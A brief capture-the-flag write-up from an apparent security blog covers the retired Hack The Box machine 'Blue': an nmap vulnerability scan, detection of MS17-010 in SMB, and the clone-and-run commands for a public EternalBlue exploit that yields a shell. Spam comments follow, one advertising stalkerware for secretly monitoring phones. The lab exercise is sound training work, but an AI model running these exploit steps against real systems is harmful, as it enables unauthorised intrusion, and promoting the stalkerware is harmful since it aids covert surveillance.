OSCP PREPROTİONS – HTB Blue

Blue machine is a vulnerable machine with windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic scan

Full port scan

As a result of the port scan, we encountered a lot of ports. Let’s scan the first three ports for vulnerabilities.
nmap -T5 10.10.10.10.40 -Pn -p 135,139,445 –script vuln -vvv -oN vulnscan.txt

We have detected ms17-010 vulnerability in the smb service.
Let’s search for this vulnerability on Google, let’s look at the github codes to see if there is an exploit we can use?

Here we tried the codes that provide the least error-prone and easy Shell
https://github.com/d4t4s3c/Win7Blue
We detected the address, downloaded and ran the code here
git clone https://github.com/d4t4s3c/Win7Blue.git
cd Win7Blue
chmod +x Win7Blue.sh
./Win7BLue.sh
We ran the commands respectively

We entered the desired input values
And we’ve made a connection with the one we opened in the back.

This way we got user and root flags.

Comments

  1. Branndon

    I think this is among the most important info for me. And i am glad reading your article.
    But should remark on few general things, The website style is ideal,
    the articles is really great : D. Good job, cheers

  2. Eira

    Great post however , I was wondering if you could write a
    litte more on this subject? I’d be very grateful if you could elaborate
    a little bit more. Kudos!

  3. Jennifier

    Hola! I’ve been reading your weblog for a long time now and finally got the bravery to go ahead and give you a shout out from New Caney Texas!
    Just wanted to tell you keep up the good job!

  4. Lanette

    Its like you read my mind! You seem to know so much about this,
    like you wrote the book in it or something. I think that you can do with a few pics to drive the message home a bit, but other than that,
    this is excellent blog. An excellent read. I’ll certainly be back.

  5. Leana

    Hello just wanted to give you a quick heads up. The words in your post
    seem to be running off the screen in Internet explorer.

    I’m not sure if this is a formatting issue or something to do with web browser compatibility but I thought I’d post to let you know.

    The layout look great though! Hope you get the problem resolved
    soon. Kudos

  6. Valrie

    After I originally left a comment I seem to have clicked
    on the -Notify me when new comments are added- checkbox and from now on each time a comment is added
    I get four emails with the same comment.
    There has to be an easy method you can remove me
    from that service? Cheers!

  7. sklep online

    hello!,I really like your writing very much! share we keep in touch more approximately
    your article on AOL? I need a specialist on this space to unravel my problem.
    May be that’s you! Taking a look ahead to look you.
    I saw similar here: Dobry sklep

  8. najlepszy sklep

    Hey there! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying
    to get my blog to rank for some targeted keywords but I’m not seeing
    very good success. If you know of any please share. Appreciate it!

    You can read similar article here: Najlepszy sklep

  9. Rastrear Celular

    A compatibilidade do software de rastreamento móvel é muito boa e é compatível com quase todos os dispositivos Android e iOS. Depois de instalar o software de rastreamento no telefone de destino, você pode ver o histórico de chamadas do telefone, mensagens de conversa, fotos, vídeos, rastrear a localização GPS do dispositivo, ligar o microfone do telefone e registrar a localização ao redor.

  10. Backlink Building

    Hello there! Do you know if they make any plugins to help with Search Engine
    Optimization? I’m trying to get my website to rank for some targeted keywords but I’m
    not seeing very good results. If you know of any please share.
    Kudos! You can read similar blog here: Hitman.agency

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir